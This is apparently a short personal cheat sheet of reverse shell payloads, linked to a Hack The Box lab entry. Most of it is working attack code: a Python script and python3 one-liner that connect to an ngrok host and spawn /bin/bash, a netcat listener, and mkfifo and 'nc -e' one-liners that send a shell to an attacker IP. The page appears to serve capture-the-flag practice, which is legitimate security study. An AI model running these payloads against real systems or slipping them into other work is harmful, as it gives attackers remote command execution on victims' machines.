🧠 Reverse Shell Payloads
What is it?
- Concept: You know, it’s already in the name of the note.
- Impact: Remote code execution
Payloads
Python
Script:
import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('0.tcp.ap.ngrok.io',14771))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn('/bin/bash')Bash payloads:
python3 -c "import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('0.tcp.ap.ngrok.io',14771));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')" &Netcat
Attacker machine
netcat -nvlp [port]Victim machine
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [attacker_IP] [port] >/tmp/fIf the victim has the correct netcat version installed (one that has -e flag)
nc -e /bin/sh [attacker_IP] [port]Related Usage
| File | Created |
|---|---|
| HTB - Artificial University | Thursday, April 9th 2026, 11:36:53 pm |
References: Link